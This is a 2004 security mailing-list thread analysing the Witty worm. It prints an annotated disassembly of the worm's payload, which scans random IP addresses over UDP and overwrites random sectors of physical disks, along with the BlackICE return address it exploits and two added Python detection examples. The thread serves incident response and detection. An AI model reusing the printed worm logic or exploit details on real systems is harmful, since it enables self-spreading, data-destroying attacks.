[Full-Disclosure] RE: Any dissasemblies of the Witty worm yet?

From: Disclosure From OSSI (disclosure_at_ossecurity.ca)
Date: 03/21/04

    To: "Kostya Kortchinsky" <kostya.kortchinsky@renater.fr>, <bugtraq@securityfocus.com>
    Date: Sat, 20 Mar 2004 23:47:21 -0500
    
    

    From the quick analysis of this worm (retrieved from
    http://isc.incidents.org/diary.html?date=2004-03-20), it seems that it bears
    strange similarity with SQL Slammer for the following points:

    1. It uses the same "push ascii" format as SQL Slammer, for example "push
    6B636F73h" in this worm.
    2. It uses hard-coded import addresses (listed below) as SQL Slammer.
    3. If someone can trace the origin of this worm, it might shed light on the
    origin of SQL Slammer as well?
    4. When SQL Slammer hit, some suspected that LION
    (http://www.cnhonker.com/index.php) did it and he refused the credit. From
    the latest articles on the http://www.cnhonker.com/index.php website, LION
    is probably not the person who released SQL Slammer, if and only if the
    writer of "witty" worm is the same writer for SQL Slammer since Lion's
    methods for importing functions are much more sophisticated than hard-coded
    import addresses shown in this worm.

    If I have time, I might provide a run-time analysis (and disassembly) of this
    worm within the context of blackd.exe. For now, just match up the addresses
    used in the disassembly by Kostya.

    Peter Huang
    http://www.ossecurity.ca/

     = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

    Analyze exploit file c:\temp\temp.bin with size 0000040f

    Found: offset 000000ef value 5e0d409c in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d409c:
           Rva 000d409c is address of import fx: KERNEL32.dll!GetModuleHandleA

    Found: offset 00000106 value 5e0d4098 in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d4098:
           Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress

    Found: offset 00000121 value 5e0d4098 in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d4098:
           Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress

    Found: offset 0000014a value 5e0d4098 in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d4098:
           Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress

    Found: offset 00000164 value 5e0d409c in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d409c:
           Rva 000d409c is address of import fx: KERNEL32.dll!GetModuleHandleA

    Found: offset 0000017f value 5e0d4098 in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d4098:
           Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress

    Found: offset 00000241 value 5e0d40dc in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d40dc:
           Rva 000d40dc is address of import fx: KERNEL32.dll!CreateFileA

    Found: offset 0000027a value 5e0d40c4 in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d40c4:
           Rva 000d40c4 is address of import fx: KERNEL32.dll!SetFilePointer

    Found: offset 00000294 value 5e0d4094 in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d4094:
           Rva 000d4094 is address of import fx: KERNEL32.dll!WriteFile

    Found: offset 0000029c value 5e0d4038 in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e0d4038:
           Rva 000d4038 is address of import fx: KERNEL32.dll!CloseHandle

    EntryPoint Info:
    Found: offset 000002a7 value 5e077663 in module C:\Program
    Files\ISS\BlackICE\iss-pam1.dll
           Datails about 5e077663:
           Rva 00077663 value 0759e4ff
           5E077663: FF E4 jmpn esp

    > -----Original Message-----
    > From: Kostya Kortchinsky [mailto:kostya.kortchinsky@renater.fr]
    > Sent: Saturday, March 20, 2004 12:39 PM
    > To: bugtraq@securityfocus.com
    > Subject: Re: Any dissasemblies of the Witty worm yet?
    >
    >
    >
    > Here is some preliminary work, I don't claim it to be exact, since
    > the API calls are guessed at the moment (I still have to get BlackICE),
    > but it should give a pretty good idea on how the thing works.
    >
    > The WriteFile might be ReadFile (which is the way Symantec sees it in
    > their analysis), but in my opinion the GENERIC_WRITE flag (and the fact
    > the memory at 0x5e000000 might be code section, then not writeable)
    > makes me think it writes arbitrary places of random physical disks -
    > with the consequences one can imagine.
    >
    > Correct me if I am wrong, I would like to receive feedback about this.
    >
    > Regards,
    >
    > Kostya Kortchinsky
    > CERT RENATER
    >
    > Nicholas Weaver wrote:
    >
    > > Has anyone done a disassembly of the "Witty" worm yet?
    > >
    > > http://isc.incidents.org/diary.html?date=2004-03-20
    > >
    > > http://securityresponse.symantec.com/avcenter/venc/data/w32.witty.worm.html
    > >
    > > using the
    > > http://seclists.org/lists/bugtraq/2004/Mar/0181.html
    > > recent bug in BlackICE/RealSecure?
    > >
    > > We are seeing a lot of activity from this worm, although even
    > > a small infection would generate a LOT of traffic (a side-effect of
    > > bandwidth-limited worms, such as single-packet UDP worms).
    > >
    > > Thanks.
    > >
    >
    > seg000:000000D1 ;
    > ------------------------------------------------------------------
    > ---------
    > seg000:000000D1
    > seg000:000000D1 loc_D1:
    > ; CODE XREF: seg000:000002ABj
    > seg000:000000D1 89 E7 mov edi, esp
    > seg000:000000D3 8B 7F 14 mov edi, [edi+14h]
    > seg000:000000D6 83 C7 08 add edi, 8
    > seg000:000000D9 81 C4 E8 FD FF FF add esp, 0FFFFFDE8h
    > seg000:000000DF 31 C9 xor ecx, ecx
    > seg000:000000E1 66 B9 33 32 mov cx, 3233h
    > ; 32
    > seg000:000000E5 51 push ecx
    > seg000:000000E6 68 77 73 32 5F push 5F327377h
    > ; ws2_
    > seg000:000000EB 54 push esp
    > seg000:000000EC db 3Eh
    > seg000:000000EC 3E FF 15 9C 40 0D+ call dword ptr
    > ds:5E0D409Ch ; Probably LoadLibrary
    > seg000:000000F3 89 C3 mov ebx, eax
    > seg000:000000F5 31 C9 xor ecx, ecx
    > seg000:000000F7 66 B9 65 74 mov cx, 7465h
    > ; et
    > seg000:000000FB 51 push ecx
    > seg000:000000FC 68 73 6F 63 6B push 6B636F73h
    > ; sock
    > seg000:00000101 54 push esp
    > seg000:00000102 53 push ebx
    > seg000:00000103 db 3Eh
    > seg000:00000103 3E FF 15 98 40 0D+ call dword ptr
    > ds:5E0D4098h ; Probably GetProcAddress
    > seg000:0000010A 6A 11 push 11h
    > ; IPPROTO_UDP
    > seg000:0000010C 6A 02 push 2
    > ; SOCK_DGRAM
    > seg000:0000010E 6A 02 push 2
    > ; AF_INET
    > seg000:00000110 FF D0 call eax
    > ; socket()
    > seg000:00000112 89 C6 mov esi, eax
    > seg000:00000114 31 C9 xor ecx, ecx
    > seg000:00000116 51 push ecx
    > seg000:00000117 68 62 69 6E 64 push 646E6962h
    > ; bind
    > seg000:0000011C 54 push esp
    > seg000:0000011D 53 push ebx
    > seg000:0000011E db 3Eh
    > seg000:0000011E 3E FF 15 98 40 0D+ call dword ptr
    > ds:5E0D4098h ; Probably GetProcAddress
    > seg000:00000125 31 C9 xor ecx, ecx
    > seg000:00000127 51 push ecx
    > seg000:00000128 51 push ecx
    > seg000:00000129 51 push ecx
    > ; sin.sin_addr.s_addr = INADDR_ANY
    > seg000:0000012A 81 E9 FE FF F0 5F sub ecx, 5FF0FFFEh
    > ; 0xa00f0002
    > seg000:00000130 51 push ecx
    > ; sin.sin_family = AF_INET
    > seg000:00000130
    > ; sin.sin_port = htons(4000)
    > seg000:00000131 89 E1 mov ecx, esp
    > seg000:00000133 6A 10 push 10h
    > ; sizeof(struct sockaddr)
    > seg000:00000135 51 push ecx
    > ; &sin
    > seg000:00000136 56 push esi
    > ; s
    > seg000:00000137 FF D0 call eax
    > ; bind()
    > seg000:00000139 31 C9 xor ecx, ecx
    > seg000:0000013B 66 B9 74 6F mov cx, 6F74h
    > ; to
    > seg000:0000013F 51 push ecx
    > seg000:00000140 68 73 65 6E 64 push 646E6573h
    > ; send
    > seg000:00000145 54 push esp
    > seg000:00000146 53 push ebx
    > seg000:00000147 db 3Eh
    > seg000:00000147 3E FF 15 98 40 0D+ call dword ptr
    > ds:5E0D4098h ; Probably GetProcAddress
    > seg000:0000014E 89 C3 mov ebx, eax
    > seg000:00000150 83 C4 3C add esp, 3Ch
    > seg000:00000153
    > seg000:00000153 loc_153:
    > ; CODE XREF: seg000:000002A2j
    > seg000:00000153 31 C9 xor ecx, ecx
    > seg000:00000155 51 push ecx
    > seg000:00000156 68 65 6C 33 32 push 32336C65h
    > ; el32
    > seg000:0000015B 68 6B 65 72 6E push 6E72656Bh
    > ; kern
    > seg000:00000160 54 push esp
    > seg000:00000161 db 3Eh
    > seg000:00000161 3E FF 15 9C 40 0D+ call dword ptr
    > ds:5E0D409Ch ; Probably LoadLibrary
    > seg000:00000168 31 C9 xor ecx, ecx
    > seg000:0000016A 51 push ecx
    > seg000:0000016B 68 6F 75 6E 74 push 746E756Fh
    > ; ount
    > seg000:00000170 68 69 63 6B 43 push 436B6369h
    > ; ickC
    > seg000:00000175 68 47 65 74 54 push 54746547h
    > ; GetT
    > seg000:0000017A 54 push esp
    > seg000:0000017B 50 push eax
    > seg000:0000017C db 3Eh
    > seg000:0000017C 3E FF 15 98 40 0D+ call dword ptr
    > ds:5E0D4098h ; Probably GetProcAddress
    > seg000:00000183 FF D0 call eax
    > ; GetTickCount()
    > seg000:00000185 89 C5 mov ebp, eax
    > seg000:00000187 83 C4 1C add esp, 1Ch
    > seg000:0000018A 31 C9 xor ecx, ecx
    > seg000:0000018C 81 E9 E0 B1 FF FF sub ecx,
    > 0FFFFB1E0h ; 0x4e20
    > seg000:00000192
    > seg000:00000192 loc_192:
    > ; CODE XREF: seg000:000001F8j
    > seg000:00000192
    > ; seg000:00000255j
    > seg000:00000192 51 push ecx
    > seg000:00000193 31 C0 xor eax, eax
    > seg000:00000195 2D 03 BC FC FF sub eax,
    > 0FFFCBC03h ; 0x343fd
    > seg000:0000019A F7 E5 mul ebp
    > seg000:0000019C 2D 3D 61 D9 FF sub eax,
    > 0FFD9613Dh ; 0x269ec3
    > seg000:000001A1 89 C1 mov ecx, eax
    > ; rand() function, without the 0x7fff mask, shift coming afterwards
    > seg000:000001A1
    > ; srand() done with GetTickCount()
    > seg000:000001A3 31 C0 xor eax, eax
    > seg000:000001A5 2D 03 BC FC FF sub eax, 0FFFCBC03h
    > seg000:000001AA F7 E1 mul ecx
    > seg000:000001AC 2D 3D 61 D9 FF sub eax, 0FFD9613Dh
    > seg000:000001B1 89 C5 mov ebp, eax
    > seg000:000001B3 31 D2 xor edx, edx
    > seg000:000001B5 52 push edx
    > seg000:000001B6 52 push edx
    > seg000:000001B7 C1 E9 10 shr ecx, 10h
    > seg000:000001BA 66 89 C8 mov ax, cx
    > seg000:000001BD 50 push eax
    > ; to.sin_addr.s_addr = (rand() << 16) | rand()
    > seg000:000001BE 31 C0 xor eax, eax
    > seg000:000001C0 2D 03 BC FC FF sub eax, 0FFFCBC03h
    > seg000:000001C5 F7 E5 mul ebp
    > seg000:000001C7 2D 3D 61 D9 FF sub eax, 0FFD9613Dh
    > seg000:000001CC 89 C5 mov ebp, eax
    > seg000:000001CE 30 E4 xor ah, ah
    > seg000:000001D0 B0 02 mov al, 2
    > seg000:000001D2 50 push eax
    > ; to.sin_family = AF_INET
    > seg000:000001D2
    > ; to.sin_port = rand()
    > seg000:000001D3 89 E0 mov eax, esp
    > seg000:000001D5 6A 10 push 10h
    > ; sizeof(struct sockaddr)
    > seg000:000001D7 50 push eax
    > ; &to
    > seg000:000001D8 31 C0 xor eax, eax
    > seg000:000001DA 50 push eax
    > ; flags
    > seg000:000001DB 2D 03 BC FC FF sub eax, 0FFFCBC03h
    > seg000:000001E0 F7 E5 mul ebp
    > seg000:000001E2 2D 3D 61 D9 FF sub eax, 0FFD9613Dh
    > seg000:000001E7 89 C5 mov ebp, eax
    > seg000:000001E9 C1 E8 17 shr eax, 17h
    > seg000:000001EC 80 C4 03 add ah, 3
    > seg000:000001EF 50 push eax
    > ; len = 0x300 + (rand() >> 7)
    > seg000:000001F0 57 push edi
    > ; buf
    > seg000:000001F1 56 push esi
    > ; s
    > seg000:000001F2 FF D3 call ebx
    > ; sendto()
    > seg000:000001F4 83 C4 10 add esp, 10h
    > seg000:000001F7 59 pop ecx
    > seg000:000001F8 E2 98 loop loc_192
    > seg000:000001FA 31 C0 xor eax, eax
    > seg000:000001FC 2D 03 BC FC FF sub eax, 0FFFCBC03h
    > seg000:00000201 F7 E5 mul ebp
    > seg000:00000203 2D 3D 61 D9 FF sub eax, 0FFD9613Dh
    > seg000:00000208 89 C5 mov ebp, eax
    > seg000:0000020A C1 E8 10 shr eax, 10h
    > seg000:0000020D 80 E4 07 and ah, 7
    > seg000:00000210 80 CC 30 or ah, 30h
    > ; 0x30 | (rand() & 7)
    > seg000:00000213 B0 45 mov al, 45h ; 'E'
    > ; E
    > seg000:00000215 50 push eax
    > seg000:00000216 68 44 52 49 56 push 56495244h
    > ; DRIV
    > seg000:0000021B 68 49 43 41 4C push 4C414349h
    > ; ICAL
    > seg000:00000220 68 50 48 59 53 push 53594850h
    > ; PHYS
    > seg000:00000225 68 5C 5C 2E 5C push 5C2E5C5Ch
    > ; \\.\
    > seg000:00000225
    > ; we get here \\.\PHYSICALDRIVE0 to \\.\PHYSICALDRIVE7
    > seg000:0000022A 89 E0 mov eax, esp
    > seg000:0000022C 31 C9 xor ecx, ecx
    > seg000:0000022E 51 push ecx
    > ; NULL
    > seg000:0000022F B2 20 mov dl, 20h ; ' '
    > seg000:00000231 C1 E2 18 shl edx, 18h
    > seg000:00000234 52 push edx
    > ; FILE_FLAG_NO_BUFFERING (0x20000000)
    > seg000:00000235 6A 03 push 3
    > ; OPEN_EXISTING
    > seg000:00000237 51 push ecx
    > ; NULL
    > seg000:00000238 6A 03 push 3
    > ; FILE_SHARE_READ | FILE_SHARE_WRITE
    > seg000:0000023A D1 E2 shl edx, 1
    > seg000:0000023C 52 push edx
    > ; GENERIC_WRITE (0x40000000)
    > seg000:0000023D 50 push eax
    > ; lpFileName
    > seg000:0000023E db 3Eh
    > seg000:0000023E 3E FF 15 DC 40 0D+ call dword ptr
    > ds:5E0D40DCh ; Probably CreateFile
    > seg000:00000245 83 C4 14 add esp, 14h
    > seg000:00000248 31 C9 xor ecx, ecx
    > seg000:0000024A 81 E9 E0 B1 FF FF sub ecx,
    > 0FFFFB1E0h ; 0x4e20
    > seg000:00000250 3D FF FF FF FF cmp eax, 0FFFFFFFFh
    > seg000:00000255 0F 84 37 FF FF FF jz loc_192
    > seg000:0000025B 56 push esi
    > ; (saving socket)
    > seg000:0000025C 89 C6 mov esi, eax
    > seg000:0000025E 31 C0 xor eax, eax
    > seg000:00000260 50 push eax
    > ; FILE_BEGIN
    > seg000:00000261 50 push eax
    > ; NULL
    > seg000:00000262 2D 03 BC FC FF sub eax, 0FFFCBC03h
    > seg000:00000267 F7 E5 mul ebp
    > seg000:00000269 2D 3D 61 D9 FF sub eax, 0FFD9613Dh
    > seg000:0000026E 89 C5 mov ebp, eax
    > seg000:00000270 D1 E8 shr eax, 1
    > seg000:00000272 66 89 C8 mov ax, cx
    > seg000:00000275 50 push eax
    > ; (rand() << 15) | 0x4e20
    > seg000:00000276 56 push esi
    > ; hFile
    > seg000:00000277 db 3Eh
    > seg000:00000277 3E FF 15 C4 40 0D+ call dword ptr
    > ds:5E0D40C4h ; Probably SetFilePointer
    > seg000:00000277 5E
    > ; (really not sure about this one)
    > seg000:0000027E 31 C9 xor ecx, ecx
    > seg000:00000280 51 push ecx
    > ; 0
    > seg000:00000281 89 E2 mov edx, esp
    > seg000:00000283 51 push ecx
    > ; NULL
    > seg000:00000284 52 push edx
    > ; lpNumberOfBytesWritten
    > seg000:00000285 B5 80 mov ch, 80h ; ''
    > seg000:00000287 D1 E1 shl ecx, 1
    > seg000:00000289 51 push ecx
    > ; nNumberOfBytesToWrite (0x10000)
    > seg000:0000028A B1 5E mov cl, 5Eh ; '^'
    > seg000:0000028C C1 E1 18 shl ecx, 18h
    > seg000:0000028F 51 push ecx
    > ; lpBuffer (0x5e000000)
    > seg000:00000290 56 push esi
    > ; hFile
    > seg000:00000291 db 3Eh
    > seg000:00000291 3E FF 15 94 40 0D+ call dword ptr
    > ds:5E0D4094h ; Probably WriteFile
    > seg000:00000298 56 push esi
    > ; hObject
    > seg000:00000299 db 3Eh
    > seg000:00000299 3E FF 15 38 40 0D+ call dword ptr
    > ds:5E0D4038h ; Probably CloseHandle
    > seg000:000002A0 5E pop esi
    > seg000:000002A1 5E pop esi
    > ; (restoring socket)
    > seg000:000002A2 E9 AC FE FF FF jmp loc_153
    > seg000:000002A2 ;
    > ------------------------------------------------------------------
    > ---------
    > seg000:000002A7 63 76 07 5E dd 5E077663h
    > seg000:000002AB ;
    > ------------------------------------------------------------------
    > ---------
    > seg000:000002AB E9 21 FE FF FF jmp loc_D1
    > seg000:000002AB ;
    > ------------------------------------------------------------------
    > ---------

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
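Peter's "Found: offset ... value ..." listing is the output of matching every 32-bit value in the captured payload against the address range of iss-pam1.dll and resolving the hits against that DLL's import table. The Python below is an added example of that matching, not Peter's tool (whose source is not in the post): the address-to-import table is transcribed from the Found: lines above, the module size 0xE0000 is an assumption chosen to cover the referenced RVAs, and the sample blob is constructed from a few instruction encodings copied out of Kostya's listing.

```python
import struct

# Address table transcribed from the "Found:" lines in Peter Huang's post:
# absolute address inside iss-pam1.dll -> the import slot it holds.
ISS_PAM1_BASE = 0x5E000000
ISS_PAM1_SIZE = 0x000E0000   # assumption: large enough to cover every RVA referenced
ISS_PAM1_IMPORTS = {
    0x5E0D4038: "KERNEL32.dll!CloseHandle",
    0x5E0D4094: "KERNEL32.dll!WriteFile",
    0x5E0D4098: "KERNEL32.dll!GetProcAddress",
    0x5E0D409C: "KERNEL32.dll!GetModuleHandleA",
    0x5E0D40C4: "KERNEL32.dll!SetFilePointer",
    0x5E0D40DC: "KERNEL32.dll!CreateFileA",
}
# The one non-import address the payload references (the "EntryPoint Info" entry).
ISS_PAM1_GADGETS = {0x5E077663: "jmp esp"}


def find_module_refs(blob, base, size, imports, gadgets):
    """Slide a 4-byte window over blob and report every little-endian dword
    that falls inside [base, base+size): every absolute reference the payload
    makes into that module, resolved against the known tables."""
    hits = []
    for off in range(len(blob) - 3):
        val = struct.unpack_from("<I", blob, off)[0]
        if base <= val < base + size:
            name = imports.get(val) or gadgets.get(val) or "unresolved"
            hits.append((off, val, name))
    return hits


def format_hit(off, val, base, name):
    """Render one hit in the same shape as the tool output quoted in the post."""
    return "Found: offset %08x value %08x  Rva %08x  %s" % (off, val, val - base, name)


# Constructed sample: instruction encodings copied from Kostya's listing and
# concatenated so that the dword operands sit at offsets 3, 10 and 19.
SAMPLE_BLOB = bytes.fromhex(
    "3EFF159C400D5E"   # call dword ptr ds:5E0D409Ch  (GetModuleHandleA slot)
    "3EFF1598400D5E"   # call dword ptr ds:5E0D4098h  (GetProcAddress slot)
    "68736F636B"       # push 6B636F73h ("sock"): outside the module, must not match
    "6376075E"         # dd 5E077663h  (the jmp esp address the overflow returns into)
)


def scan_sample():
    return find_module_refs(SAMPLE_BLOB, ISS_PAM1_BASE, ISS_PAM1_SIZE,
                            ISS_PAM1_IMPORTS, ISS_PAM1_GADGETS)


if __name__ == "__main__":
    for off, val, name in scan_sample():
        print(format_hit(off, val, ISS_PAM1_BASE, name))
```

Against a real sample the import table would be read from the PE's import directory and the size from its optional header rather than typed in. The value of the scan for a responder is in what the hits say: absolute addresses like these only hold for one specific build of iss-pam1.dll, so a set of resolved slots pins down which module build the payload was written against, and the single hit that is not an import slot (5e077663, the `jmp esp`) is the saved return address the overflow overwrites to get control onto the stack.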


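Kostya's listing gives everything needed to state what the worm's traffic looks like on the wire: the socket is bound to port 4000 (the 0xa00f0002 sockaddr), the destination address and port come from the MSVCRT-style LCG seeded with GetTickCount, and the sendto length is 0x300 plus a 9-bit slice of the generator state, so every datagram carries between 768 and 1279 payload bytes. The Python below is an added example, not part of the post: it replays the register arithmetic of one loc_192 iteration so the length window can be checked, then applies the resulting signature (UDP, source port 4000, payload length in that window, many datagrams per source) to constructed flow records. The record format and the sample lines are made up for the example.

```python
import re

# Constants read off the disassembly quoted in the post.
LCG_MUL, LCG_INC = 0x343FD, 0x269EC3      # sub eax,0FFFCBC03h ; mul ; sub eax,0FFD9613Dh
SRC_PORT = 4000                           # bind(): 0xa00f0002 -> sin_port = htons(4000)
BURST = 0x4E20                            # 20000 sendto() calls per pass of loc_192
MIN_LEN, MAX_LEN = 0x300, 0x300 + 0x1FF   # len = 0x300 + (state >> 23), a 9-bit value


def lcg_next(state):
    """One step of the MSVCRT rand() recurrence. The worm keeps the raw 32-bit
    state in ebp and never applies the >>16 & 0x7fff that rand() itself does."""
    return (state * LCG_MUL + LCG_INC) & 0xFFFFFFFF


def packet_params(state):
    """Replay the register arithmetic of one loc_192 iteration.
    Returns (new_state, sin_addr, dst_port, payload_len)."""
    s1 = lcg_next(state)                          # ecx
    s2 = lcg_next(s1)                             # ebp
    sin_addr = (s2 & 0xFFFF0000) | (s1 >> 16)     # shr ecx,10h ; mov ax,cx
    s3 = lcg_next(s2)
    raw_port = s3 >> 16                           # xor ah,ah ; mov al,2 : high word is sin_port
    dst_port = ((raw_port & 0xFF) << 8) | (raw_port >> 8)   # sin_port is network byte order
    s4 = lcg_next(s3)
    payload_len = MIN_LEN + (s4 >> 23)            # shr eax,17h ; add ah,3
    return s4, sin_addr, dst_port, payload_len


def observed_length_bounds(seed, n=BURST):
    """Walk one burst from a seed and return the (min, max) payload length seen."""
    state, lo, hi = seed, MAX_LEN, MIN_LEN
    for _ in range(n):
        state, _, _, ln = packet_params(state)
        lo, hi = min(lo, ln), max(hi, ln)
    return lo, hi


# Constructed flow-record format, one line per datagram; len is the UDP payload size.
FLOW_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<proto>\w+) (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) len=(?P<len>\d+)$")


def matches_witty(line):
    """UDP, source port 4000, payload length inside the 768..1279 window."""
    m = FLOW_RE.match(line)
    if not m:
        return False
    return (m["proto"] == "UDP" and int(m["sport"]) == SRC_PORT
            and MIN_LEN <= int(m["len"]) <= MAX_LEN)


def suspect_sources(lines, threshold):
    """Count matching datagrams per source host. The worm emits 20000 per burst,
    so even a low threshold separates it from a stray UDP/4000 datagram."""
    counts = {}
    for line in lines:
        if matches_witty(line):
            src = FLOW_RE.match(line)["src"]
            counts[src] = counts.get(src, 0) + 1
    return {src: n for src, n in counts.items() if n >= threshold}


# Constructed sample records (addresses from documentation ranges).
SAMPLE_FLOWS = [
    "2004-03-20 12:00:01 UDP 10.0.0.5:4000 -> 192.0.2.17:51234 len=1024",
    "2004-03-20 12:00:01 UDP 10.0.0.5:4000 -> 198.51.100.9:443 len=768",
    "2004-03-20 12:00:01 UDP 10.0.0.5:4000 -> 203.0.113.77:6 len=1279",
    "2004-03-20 12:00:02 UDP 10.0.0.5:4000 -> 192.0.2.1:4000 len=600",   # too short
    "2004-03-20 12:00:02 TCP 10.0.0.7:4000 -> 192.0.2.2:80 len=900",      # not UDP
    "2004-03-20 12:00:03 UDP 10.0.0.8:53 -> 192.0.2.3:3072 len=900",      # wrong source port
    "2004-03-20 12:00:03 UDP 10.0.0.9:4000 -> 192.0.2.4:1234 len=900",    # one match only
]

if __name__ == "__main__":
    print(observed_length_bounds(seed=0, n=2000))
    print(suspect_sources(SAMPLE_FLOWS, threshold=2))
```

The destination address and port are useless as signature material because both are fresh generator output for every datagram; the fixed source port and the bounded length are the constants, and the per-source count is what turns a coarse match into a confident one. A length window of 512 values on UDP/4000 alone will also catch legitimate traffic, which is why the example thresholds on volume rather than alerting on a single datagram.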